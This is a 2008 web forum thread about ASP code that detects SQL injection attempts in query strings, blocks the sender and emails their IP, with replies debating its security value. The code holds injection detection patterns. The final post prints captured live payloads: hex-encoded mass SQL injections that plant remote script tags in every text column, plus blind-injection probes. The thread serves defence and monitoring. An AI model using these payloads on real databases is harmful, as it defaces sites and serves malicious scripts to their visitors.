SQL inject bots be gone

ASP Free Forums Sponsor:

SlickEdit: Code in over 40 languages across 7 platforms. SlickEdit’s unmatched power, speed, and flexibility allows even the most accomplished developers to write better code faster. Download a free trial today!

May 6th, 2008, 07:53 PM

Dr_Rock

Wizard Down Under

Join Date: Dec 2006

Location: Australia

Posts: 248

Time spent in forums: 3 Days 3 h 36 m 46 sec
Reputation Power: 211

SQL inject bots be gone

Hey guys,

I have made a pretty neat error reporting function that emails me with any errors that occur on my site, I am finding daily that the same SQL inject methods are being tried on any page with a query string. Ofcourse they have no chance of doing any damage as I would never send unsanitized data to my SQL server but why should my bandwidth be wasted on these losers?

So the following code will detect these attempts and send blank pages to these nasty characters, it sets a cookie which can be cleared if the visitor decides they want to behave and emails their IP to your email account.

Code:

Dim strPolice
If Request.Cookies("hacker") = "1" Then
	GoToJail()
Else
	strPolice = Request.QueryString
        'put any known exploits on the next line
	If instr(strPolice, "char(124)+user+char(124)") OR instr(strPolice, "' and 1=1 and ''='") Then
		Response.Cookies("hacker") = "1"
		Call WhistleBlower(SITE_EMAIL, TECH_EMAIL, "Hack attempt", request.ServerVariables("REMOTE_ADDR"))
		Response.Redirect("/")
	End If
End If

Function GoToJail()
	Response.Write("You have been identified as a hacker, please clear your cookies to proceed")
	Response.end()
End Function

Function WhistleBlower(strSender, strRecipient, strSubject, strBody)
	Dim objConfig, objMail, objFlds
	Set objConfig = Server.CreateObject("CDO.Configuration")

	Set objFlds = objConfig.Fields
		objFlds("http://schemas.microsoft.com/cdo/configuration/sendusing") = 1
		objFlds("http://schemas.microsoft.com/cdo/configuration/smtpserverpickupdirectory") = "C:\pickup_folder"
		objFlds.Update
		
	Set objMail=CreateObject("CDO.Message")
	Set objMail.Configuration = objConfig
	objMail.Subject=strSubject
	objMail.From=strSender
	objMail.To=strRecipient
	'objMail.Bcc="someone@somewhere.com"
	objMail.HtmlBody=strBody
	objMail.Send
	set objMail=nothing
End Function

The "GoToJail()" function can be modified if you want to send some nasty code back their way, but I try to live by the golden rule

Comments on this post

selwonk agrees: Excellent concept!

__________________
For my first trick watch me turn a zero into a one...

Last edited by Dr_Rock : May 6th, 2008 at 08:36 PM.

June 17th, 2008, 07:41 PM

Dr_Rock

Wizard Down Under

Join Date: Dec 2006

Location: Australia

Posts: 248

Time spent in forums: 3 Days 3 h 36 m 46 sec
Reputation Power: 211

Updated version (couldnt edit post for some reason)

Code:

' block the hackers that keep trying to get smart
Dim strPolice
If Request.Cookies("hacker") = "1" Or Session("hacker") = "1" Then
	DenyAccess()
Else
	strPolice = Ucase(Request.QueryString)
	If session("debug") = "on" then response.write(strPolice)
	If instr(strPolice, "CHAR(1") OR instr(strPolice,"S=CAST") OR instr(strPolice,"EXEC") Then
		Response.Cookies("hacker") = "1"
		Session("hacker") = "1"
		Call SendCDOMail(SITE_EMAIL, TECH_EMAIL, "Hack attempt", request.ServerVariables("REMOTE_ADDR")&"<br/>"&strPolice)
		Response.Redirect("/")
	End If
End If

Function DenyAccess()
	Response.Write("You have been identified as a hacker, please clear your cookies and open the site in a new window to proceed")
	Response.end()
End Function

Function SendCDOMail(strSender, strRecipient, strSubject, strBody)
	Dim objMail, objFlds
	Set objMail=CreateObject("CDO.Message")
	objMail.Subject=strSubject
	objMail.From=strSender
	objMail.To=strRecipient
	objMail.HtmlBody=strBody
	objMail.Send
	set objMail=nothing
End Function

This one will catch a couple of extra SQL inject methods, also includes email notification of hacker IP address and locks them out for the session.

Last edited by Dr_Rock : June 17th, 2008 at 08:59 PM.

June 19th, 2008, 10:46 PM

baseballdude_

Expert Learner

ASP Free Intermediate (1500 - 1999 posts)

Join Date: Feb 2005

Location: Wisconsin

Posts: 1,856

Folding Points: 22104 Folding Title: Starter Folder

Time spent in forums: 1 Week 5 Days 9 h 30 m 59 sec
Reputation Power: 59

Send a message via Yahoo to baseballdude_

Send a message via Google Talk to baseballdude_

If your website contains forms or stores data in cookies, you might consider checking Request.Form() and Request.Cookies() along with Request.QueryString().

Comments on this post

Dr_Rock agrees: Valid point, my pages dont accept any form values without heavy validation, and I never use cookies
in queries

__________________
www.xoise.com - www.ourfreegames.com - www.playtouchgames.com - www.randomtools.net - www.xenocide-rpg.com

June 19th, 2008, 11:34 PM

Memnoch

Unholy Moderator

ASP Free God 14th Plane (11500 - 11999 posts)

Join Date: Oct 2003

Location: In hell, where did you think?

Posts: 11,738

Time spent in forums: 3 Weeks 5 Days 1 h 34 m 28 sec
Reputation Power: 443

What prevents someone from changing the "hacker" cookie to a value other then "1"?

June 19th, 2008, 11:40 PM

Dr_Rock

Wizard Down Under

Join Date: Dec 2006

Location: Australia

Posts: 248

Time spent in forums: 3 Days 3 h 36 m 46 sec
Reputation Power: 211

Quote:

Originally Posted by Memnoch

What prevents someone from changing the "hacker" cookie to a value other then "1"?

Hence the Session("hacker"), The idea is that if by some far out circumstance the request is valid or accidental the user can clear their cookie and open a new window and continue to use the site, if they have to do that every time they send nasty code then it is going to be a slow process... and since it catches each request, completely fruitless.

The point of this is not to stop injection, this is taken care of by good programming techniques in the rest of the site, it is to monitor this kind of activity and to conserve bandwidth if your site happens to get targeted by aggressive inject bots which hit up every single page it can find with a query string.

Some days mine can get hit with 200+ malicious requests (multiple rank1 google keywords), times that by 100k per page thats 20MB down the gurgler a day

Last edited by Dr_Rock : June 22nd, 2008 at 07:21 PM. Reason: said 500k per page, may have been a bit of an exaggeration

June 23rd, 2008, 12:33 PM

Memnoch

Unholy Moderator

Join Date: Oct 2003

Location: In hell, where did you think?

Posts: 11,738

Time spent in forums: 3 Weeks 5 Days 1 h 34 m 28 sec
Reputation Power: 443

My initial thought is this "hacker" blocking isn't even needed if proper whitelisting techniques are in place, along with proper client-side and server-side validation.

Additionally, what parts of the request are being validated for malicious content?

- Form inputs
- Querystring values
- Cookie values
- Header values
etc...

I think someone, who doesn't know about security, would try to implement this and get a false sense of security. Thinking their application was protected from hackers, which isn't the case.

I admire your desire to create something to notify developers of potential attacks, but anything done after the fact is just a band-aid. Closing the barn doors after all the animals have gone.

What developers really need to know, learn and do is proper input validation. Implementation of proper whitelisting techniques will go miles further then a band-aid implemented after the fact, that's meant to supplement the insecure code they've written.

Comments on this post

Dr_Rock agrees: Totally missing the point of the script but the advice is sound

Last edited by Memnoch : June 23rd, 2008 at 12:38 PM.

June 23rd, 2008, 06:18 PM

baseballdude_

Expert Learner

Join Date: Feb 2005

Location: Wisconsin

Posts: 1,856

Time spent in forums: 1 Week 5 Days 9 h 30 m 59 sec
Reputation Power: 59

First, I definitely agree.

However, once all aforementioned security measures are properly put in place, it is sometimes necessary to implement further security measures like this one JUST in case.

The problem usually lies in the fact that old code (like in my case) was written before people know as much as they do now. The old programmer of one of the websites I work on left me some pretty sloppy code and I'm not able to just go through and rewrite the entire website due to the sheer volume of scripts. In my case, something like this IS necessary, although admittedly very sloppy.

Comments on this post

Dr_Rock agrees: GUYS!!! This is not a validation/sanitation script! It is to monitor and conserve bandwidth only!!!
The security it adds is just a bonus...

June 23rd, 2008, 07:42 PM

Memnoch

Unholy Moderator

Join Date: Oct 2003

Location: In hell, where did you think?

Posts: 11,738

Time spent in forums: 3 Weeks 5 Days 1 h 34 m 28 sec
Reputation Power: 443

I agree it would be beneficial as a logging utility to identify malicious requests and track where they came from. It could also be used as a nice tool to identify various types of attacks a hacker might use.

I don't agree it should be used as any type of tool to prevent a hacker attack.

June 23rd, 2008, 08:07 PM

Dr_Rock

Wizard Down Under

Join Date: Dec 2006

Location: Australia

Posts: 248

Time spent in forums: 3 Days 3 h 36 m 46 sec
Reputation Power: 211

Good that we have that cleared up, now just to mak sure the concept of this program is clear as crystal I will list the intended functions in point form and in order of priority.

Block data from being sent to non-genuine users, thus redusing unnecessary bandwidth usage
Monitor methods, sources and frequency of attacks
Stop some malicious requests before they reach your code

This script DOES NOT do the following:

Does not block all possible query string attacks
Does not block request form attacks
Does not block cookie manipulation
Does not block header manipulation
Does not block cross site scripting
Is not to be used as a primary security measure

#10

June 23rd, 2008, 08:25 PM

Dr_Rock

Wizard Down Under

Join Date: Dec 2006

Location: Australia

Posts: 248

Time spent in forums: 3 Days 3 h 36 m 46 sec
Reputation Power: 211

Some examples of attacks that are being blocked!

I post this knowing the risk of breaking the forum but I assume its all up to scratch security wise...

Here are some examples of attacks that I have successfully collected:

Code:

;SET%20@S=CAST(0x4445434C4152452040542056415243484  15228323535292C40432056415243484152283235352920444  5434C415245205461626C655F437572736F7220435552534F5  220464F522053454C45435420612E6E616D652C622E6E616D6  52046524F4D207379736F626A6563747320612C737973636F6  C756D6E73206220574845524520612E69643D622E696420414  E4420612E78747970653D27752720414E442028622E7874797  0653D3939204F5220622E78747970653D3335204F5220622E7  8747970653D323331204F5220622E78747970653D313637292  04F50454E205461626C655F437572736F72204645544348204  E4558542046524F4D205461626C655F437572736F7220494E5  44F2040542C4043205748494C4528404046455443485F53544  15455533D302920424547494E2045584543282755504441544  5205B272B40542B275D20534554205B272B40432B275D3D525  452494D28434F4E56455254285641524348415228343030302  92C5B272B40432B275D29292B27273C7363726970742073726  33D687474703A2F2F7777772E63686B6164772E636F6D2F622  E6A733E3C2F7363726970743E27272729204645544348204E4  558542046524F4D205461626C655F437572736F7220494E544  F2040542C404320454E4420434C4F5345205461626C655F437  572736F72204445414C4C4F43415445205461626C655F43757  2736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

Code:

;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445  434C415245204054205641524348415228323535292C404320  564152434841522832353529204445434C415245205461626C  655F437572736F7220435552534F5220464F522053454C4543  5420612E6E616D652C622E6E616D652046524F4D207379736F  626A6563747320612C737973636F6C756D6E73206220574845  524520612E69643D622E696420414E4420612E78747970653D  27752720414E442028622E78747970653D3939204F5220622E  78747970653D3335204F5220622E78747970653D323331204F  5220622E78747970653D31363729204F50454E205461626C65  5F437572736F72204645544348204E4558542046524F4D2054  61626C655F437572736F7220494E544F2040542C4043205748  494C4528404046455443485F5354415455533D302920424547  494E20455845432827555044415445205B272B40542B275D20  534554205B272B40432B275D3D525452494D28434F4E564552  5428564152434841522834303030292C5B272B40432B275D29  292B27273C736372697074207372633D687474703A2F2F7777  772E63686B6164772E636F6D2F622E6A733E3C2F7363726970  743E27272729204645544348204E4558542046524F4D205461  626C655F437572736F7220494E544F2040542C404320454E44  20434C4F5345205461626C655F437572736F72204445414C4C  4F43415445205461626C655F437572736F7220%20AS%20VARC  HAR(4000));EXEC(@S);--

Code:

;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440  0450043004C004100520045002000400054002000760061007  2006300680061007200280032003500350029002C004000430  02000760061007200630068006100720028003200350035002  90020004400450043004C00410052004500200054006100620  06C0065005F0043007500720073006F0072002000430055005  20053004F005200200046004F0052002000730065006C00650  063007400200061002E006E0061006D0065002C0062002E006  E0061006D0065002000660072006F006D00200073007900730  06F0062006A006500630074007300200061002C00730079007  30063006F006C0075006D006E0073002000620020007700680  0650072006500200061002E00690064003D0062002E0069006  400200061006E006400200061002E007800740079007000650  03D00270075002700200061006E0064002000280062002E007  80074007900700065003D003900390020006F0072002000620  02E00780074007900700065003D003300350020006F0072002  00062002E00780074007900700065003D00320033003100200  06F007200200062002E00780074007900700065003D0031003  6003700290020004F00500045004E0020005400610062006C0  065005F0043007500720073006F00720020004600450054004  300480020004E004500580054002000460052004F004D00200  020005400610062006C0065005F0043007500720073006F007  200200049004E0054004F002000400054002C0040004300200  05700480049004C00450028004000400046004500540043004  8005F005300540041005400550053003D00300029002000420  04500470049004E00200065007800650063002800270075007  000640061007400650020005B0027002B00400054002B00270  05D00200073006500740020005B0027002B00400043002B002  7005D003D0072007400720069006D00280063006F006E00760  0650072007400280076006100720063006800610072002C005  B0027002B00400043002B0027005D00290029002B002700270  03C0073006300720069007000740020007300720063003D006  8007400740070003A002F002F007700770077002E006A00380  06A0038006800650069002E0063006E002F006B002E006A007  3003E003C002F007300630072006900700074003E002700270  0270029004600450054004300480020004E004500580054002  000460052004F004D00200020005400610062006C0065005F0  043007500720073006F007200200049004E0054004F0020004  00054002C0040004300200045004E004400200043004C004F0  05300450020005400610062006C0065005F004300750072007  3006F00720020004400450041004C004C004F0043004100540  0450020005400610062006C0065005F0043007500720073006  F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

Code:

'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'  '='

Code:

' and 1=1 and ''='

Code:

OR 0 IN (SELECT TOP 1 CHAR(60) CHAR(122) CHAR(122) CHAR(104) CHAR(110) CHAR(107) CHAR(99) CHAR(119) CHAR(102) CHAR(62) COALESCE(CAST(0 AS VARCHAR(8000)),SPACE(0)) CHAR(60) CHAR(113) CHAR(100) CHAR(117) CHAR(116) CHAR(117) CHAR(115) CHAR(119) CHAR(98) CHAR(62)) OR 0 IN (SELECT CHAR(60) CHAR(122) CHAR(120) CHAR(107) CHAR(114) CHAR(108) CHAR(122) CHAR(105) CHAR(113) CHAR(62))--D1855E

Many many more in the list that these came from....

Thread Tools	Search this Thread
Email this Page	Search this Thread: Advanced Search
Display Modes	Rate This Thread
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode	Rate This Thread: